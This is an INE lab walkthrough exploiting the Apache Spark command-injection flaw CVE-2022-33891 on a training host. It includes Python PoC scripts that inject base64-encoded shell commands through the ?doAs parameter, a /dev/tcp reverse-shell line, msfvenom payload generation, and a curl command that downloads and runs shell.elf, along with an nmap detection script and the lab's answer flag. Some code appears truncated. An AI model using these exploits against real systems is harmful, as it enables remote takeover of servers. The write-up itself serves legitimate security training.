Lab Walkthrough - Apache ...
    24 August 22

    Lab Walkthrough - Apache Spark Shell Command Injection

    Posted byINE

    In our lab walkthrough series, we go through selected lab exercises on our INE Platform. Subscribe or sign up for a 7-day, risk-free trial with INE and access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Purpose: We are learning about how to exploit Apache Spark using the Metasploit Framework module. Also, we will use the python language to write/modify existing scripts for exploiting the Apache Spark application. 

    Technical difficulty: Beginner


    In 2022, a critical Shell Command Injection vulnerability was found in the Apache Spark server. The Apache Spark UI offers the possibility to enable ACLs via the configuration option spark.acls.enable. An authentication filter, checks whether a user has access permissions to view or modify the application. If ACLs are enabled, a code path in HttpSecurityFilter can allow someone to perform impersonation by providing an arbitrary user name. A malicious user might then be able to reach a permission check function that will ultimately build a Unix shell command based on their input and execute it. This will result in arbitrary shell command execution as the user Spark is currently running as.

    This affects Apache Spark versions 3.0.3 and earlier, versions 3.1.1 to 3.1.2, and versions 3.2.0 to 3.2.1.

    The vulnerability was discovered by Kostya Kortchinsky, a cybersecurity researcher from Databricks.

    Read More:

    What is Command Injection?

    A cyberattack known as command injection includes running unauthorized commands on the host operating system. Usually, the threat actor inserts the orders by taking advantage of an application flaw, like inadequate input validation.

    Lab Link:


    Lab Environment

    In this lab environment, the user will access a Kali GUI instance. A vulnerable machine Apache Spark deployed on http://demo.ine.local:8080

    Goal after completing this scenario: Access the /flag.txt file and read the flag!



    The best tools for this lab are:

    • Nmap

    • Bash Shell

    • Metasploit Framework

    • Python

    What is Apache Spark?

    Apache Spark is a multi-language engine for executing data engineering, data science, and machine learning on single-node machines or clusters.

    Apache Spark Key features

    Batch/streaming data

    Unify the processing of your data in batches and real-time streaming, using your preferred language: Python, SQL, Scala, Java or R.

    SQL analytics

    Execute fast, distributed ANSI SQL queries for dashboarding and ad-hoc reporting. Runs faster than most data warehouses.

    Data science at scale

    Perform Exploratory Data Analysis (EDA) on petabyte-scale data without having to resort to downsampling

    Machine learning

    Train machine learning algorithms on a laptop and use the same code to scale to fault-tolerant clusters of thousands of machines.


    Vulnerability Configuration

    • Enable the ACLs via the configuration option spark.acls.enable. i.e, conf/spark-defaults.conf

    Vulnerable Source Code


    private def getUnixGroups(username: String): Set[String] = {
    -    val cmdSeq = Seq("bash", "-c", "id -Gn " + username)
       // we need to get rid of the trailing "\n" from the result of command execution
    -    Utils.executeAndGetOutput(cmdSeq).stripLineEnd.split(" ").toSet
    +   Utils.executeAndGetOutput(idPath ::  "-Gn" :: username :: Nil).stripLineEnd.split(" ").toSet


    • Vulnerable parameter

    http://demo.ine.local:8080/?doAs=`[command injection here]`

    The command injection occurs because Spark checks the user group membership passed in the ?doAs parameter by using a raw Linux command.

    User commands are processed through ?doAs parameter, and nothing is reflected back on the page during command execution, so this is blind OS injection. Your commands run, but there will be no indication if they worked or not or even if the program you’re running is on target.

    OS commands that are passed on the URL parameters ?doAs will trigger the background Linux bash process, which calls **cmdseq** and will run the process with the command line id, -Gn.



    Step 1: Open the lab link to access the Kali machine.

    Kali machine


    Step 2: Check if the provided machine is reachable.


    ping -c 4 demo.ine.local

    The provided machine is reachable.

    Step 3: Check all open ports on the machine.


    nmap demo.ine.local

    Multiple ports are open. The Apache Spark server is running on port 8080.

    Step 4: Run the firefox browser and access port 8080 to identify the Apache Spark server version.

    URL: http://demo.ine.local:8080



    The target Apache Spark server version is 3.1.1.

    Step 5: Running the command on the target using the vulnerable parameter “?doAs.”

    Just type the URL on the Kali terminal.



    Successfully executed id command on the target server and received an output.

    Note: You won’t receive the output of all Linux commands

    This confirms that the target is vulnerable to CVE-2022–33891

    Step 6: Writing a nmap script that will detect the vulnerable spark version, i.e., 3.1.1

    Nmap script

    -- The Head Section --
    description = [[The script to detect The Apache Spark Shell Command Injection vulnerability]]
    -- @usage
    -- nmap --script detect-spark-vuln <target>
    -- @output
    -- 8080/tcp open  http
    -- |_detect-spark-vuln: Apache Spark is Vulnerable to Command Injection
    categories = {"default", "safe"}
    local shortport = require "shortport"
    local http = require "http"
    local stdnse = require "stdnse"
    local string = require "string"
    -- The Rule Section --
    portrule = shortport.http
    -- The Action Section --
    action = function(host, port)
       local uri = "/"
       local text1 = "3.1.1"
       local response = http.get(host, port, uri)
       if ( response.status == 200 ) then
           local bodystr = string.match(response.body, text1)
           if ( bodystr == text1 ) then
               return "Apache Spark is Vulnerable to Command Injection!!"
               return "Apache Spark Not Vulnerable!!"

    The script is pretty straightforward. It accesses the target on port 8080 and matches the given string, i.e., 3.1.1, then gives an output if it’s vulnerable or not.

    Save the above code on the attacker’s machine and run it. The file extension should be .nse


    nano detect-spark-vuln.nse

    <paste code>


    Run the script.

    nmap — script detect-spark-vuln.nse demo.ine.local

    Successfully detected the Apache Spark server version 3.1.1 using a nmap custom script.

    Step 7: Running the python script to detect the Apache Spark Command Injection vulnerability

    Python Script

    #!/usr/bin/env python3
    import requests
    import argparse
    import base64
    import datetime
    from colorama import Fore
    parser = argparse.ArgumentParser(description='CVE-2022-33891 Python POC Exploit Script')
    parser.add_argument('-u', '--url', help='URL to exploit.', required=True)
    parser.add_argument('-p', '--port', help='Exploit target\'s port.', required=True)
    parser.add_argument('--revshell', default=False, action="store_true", help="Reverse Shell option.")
    parser.add_argument('-lh', '--listeninghost', help='Your listening host IP address.')
    parser.add_argument('-lp', '--listeningport', help='Your listening host port.')
    parser.add_argument('--check', default=False, action="store_true", help="Checks if the target is exploitable with a sleep test")
    parser.add_argument('--verbose', default=False, action="store_true", help="Verbose mode")
    args = parser.parse_args()
    # nothing to see here, move along!
    headers = {
       'User-Agent': 'CVE-2022-33891 POC',
    # Colors :D
    info = (Fore.BLUE + "[*] " + Fore.RESET)
    recc = (Fore.YELLOW + "[*] " + Fore.RESET)
    good = (Fore.GREEN + "[+] " + Fore.RESET)
    important = (Fore.CYAN + "[!] " + Fore.RESET)
    printError = (Fore.RED + "[X] " + Fore.RESET)
    full_url = f"{args.url}:{args.port}"
    def check_for_vuln(url):
           print(info + "Attempting to connect to site...")
           r = requests.get(f"{url}/?doAs='testing'", allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"URL request: {url}/?doAs='testing'")
               print(info + f"Response status code: {r.status_code}")
           if r.status_code != 403:
               print(printError + "No ?doAs= endpoint. Does not look vulnerable.")
           elif "org.apache.spark.ui" not in r.content.decode("utf-8"):
               print(printError + "Does not look like an Apache Spark server.")
               print(important + "Performing sleep test of 10 seconds...")
               t1 =
               if args.verbose:
                   print(info + f"T1: {t1}")
               run_cmd("sleep 10")
               t2 =
               delta = t2-t1
               if args.verbose:
                   print(info + f"T2: {t2}")
                   print(info + f"Delta T: {delta.seconds}")
               if delta.seconds not in range(8,12):
                   print(printError + "Sleep was less than 10. This target is probably not vulnerable")
                   print(good + "Sleep was 10 seconds! This target is probably vulnerable!")
       except Exception as e:
           print(printError + str(e))
    def cmd_prompt():
       cmd = input("[cve-2022-33891> ")
       return cmd
    def base64_encode(cmd):
           message_bytes = cmd.encode('ascii')
           base64_bytes = base64.b64encode(message_bytes)
           base64_cmd = base64_bytes.decode('ascii')
           return base64_cmd
       except Exception as e:
           print(printError +str(e))
    def run_cmd(cmd):
           if args.verbose:
               print(info + "Command is: " + cmd)
           base64_cmd = base64_encode(cmd)
           if args.verbose:
               print(info + "Base64 command is: " + base64_cmd)
           exploit = f"/?doAs=`echo {base64_cmd} | base64 -d | bash`"
           exploit_req = f"{full_url}{exploit}"
           if args.verbose:
               print(info + "Full exploit request is: " + exploit_req)
               print(info + "Sending exploit...")
           r = requests.get(exploit_req, allow_redirects=False, headers=headers)
           if args.verbose:
               print(info + f"Response status code: {r.status_code}\n"+ info + "Hint: 403 is good.")
       except Exception as e:
           print(printError + str(e))
    def revshell(lhost, lport):
       print(info + f"Reverse shell mode.\n" + recc+ f"Set up your listener by entering the following:\nnc -nvlp {lport}")
       input(recc + "When your listener is set up, press enter!")
       rev_shell_cmd = f"sh -i >& /dev/tcp/{lhost}/{lport} 0>&1"
    def main():
           if args.check and args.revshell:
               print(printError + "Please choose either revshell or check!")
           elif args.check:
           # Revshell
           elif args.revshell:
               if not (args.listeninghost and args.listeningport):
                   print(printError + "You need --listeninghost and --listeningport!")
                   lhost = args.listeninghost
                   lport = args.listeningport
                   revshell(lhost, lport)
               # "Interactive" mode
               print(info + "\"Interactive\" mode!\n" + important + "Note: you will not receive any output from these commands. Try using something like ping or sleep to test for execution.")
               while True:
                   command_to_run = cmd_prompt()
       except KeyboardInterrupt:
           print("\n"+ info + "Goodbye!")
    if __name__ == "__main__":

    Copy and paste the above code into the Kali GUI and run the PoC code to check if target version is vulnerable or not.

    Check the script help option.


    python3 — help

    Running the script to verify the vulnerability.


    python3 -u http://demo.ine.local -p 8080 — check — verbose

    Target appears to be vulnerable.

    Step 8: Rewriting a simple python script to execute a command on the target server

    Python Script

    import requests
    import argparse
    import json
    import random
    import string
    import base64
    my_parser = argparse.ArgumentParser(description='Apache Spark Command Injection')
    my_parser.add_argument('-T', '--URL', type=str)
    args = my_parser.parse_args()
    target = args.URL
    def shell(target):
       url = target
       r = requests.get(target)
       if r.status_code == 200:
          print("[+] Exploiting")
          print("[+] Getting the shell... :)")
          while 1:
                  command = input("# ")
                  command_to_encode = command.encode('ascii')
                  base64_format = base64.b64encode(command_to_encode)
                  base64_final_cmd = base64_format.decode('ascii')
                  print("Base64 Command: " + base64_final_cmd)
                  payload = f"/?doAs=`echo {base64_final_cmd} | base64 -d | bash`"
                  exploiting = f"{url}{payload}"
                  r = requests.get(exploiting, allow_redirects=False)
                  print("Command Executed")
              except KeyboardInterrupt:
           print ("[*] Some issue accrued.")

    Copy and paste the above code in the Kali GUI and run the PoC code to gain the meterpreter shell.


    Check the Attacker Machine IP address:


    ip addr

    Generate the .elf malicious executable for reverse connection.


    msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST= LPORT=4444 -f elf > shell.elf
    file shell.elf

    Start Python simple HTTP server to serve the shell.elf file.


    python3 -m http.server 80

    Start Metasploit multi-handler for the new meterpreter session.


    msfconsole -q
    use exploit/multi/handler
    set PAYLOAD linux/x64/meterpreter/reverse_tcp
    set LHOST

    Check if the script is running correctly by checking its help option.


    python3 — help

    It’s working fine. Run the script and download the shell.elf file on the target machine using curl by exploiting the vulnerability.


    python3 — URL http://demo.ine.local:8080


    curl — output /tmp/shell.elf; chmod +x /tmp/shell.elf; /bin/bash -c “/tmp/shell.elf”

    Successfully downloaded the shell.elf file in the /tmp/ directory and executed it on the target machine. After the execution of the shell.elf file received a meterpreter session:


    Step 9: Find the flag.


    ls /
    cat /flag.txt

    FLAG: aad8ee70c54f1cc0c0aad082423b09fe


    • Upgrade to supported Apache Spark maintenance release 3.1.3, 3.2.2, or 3.3.0 or later


    1. Apache Spark

    2. PoC

    3. CVE-2022–33891

    Try this lab for yourself! Subscribe or sign up for a 7-day, risk-free trial with INE to access this lab and a robust library covering the latest in Cyber Security, Networking, Cloud, and Data Science!

    Hey! Don’t miss anything - subscribe to our newsletter!

    © 2022 INE. All Rights Reserved. All logos, trademarks and registered trademarks are the property of their respective owners.
    instagram Logofacebook Logotwitter Logolinkedin Logoyoutube Logo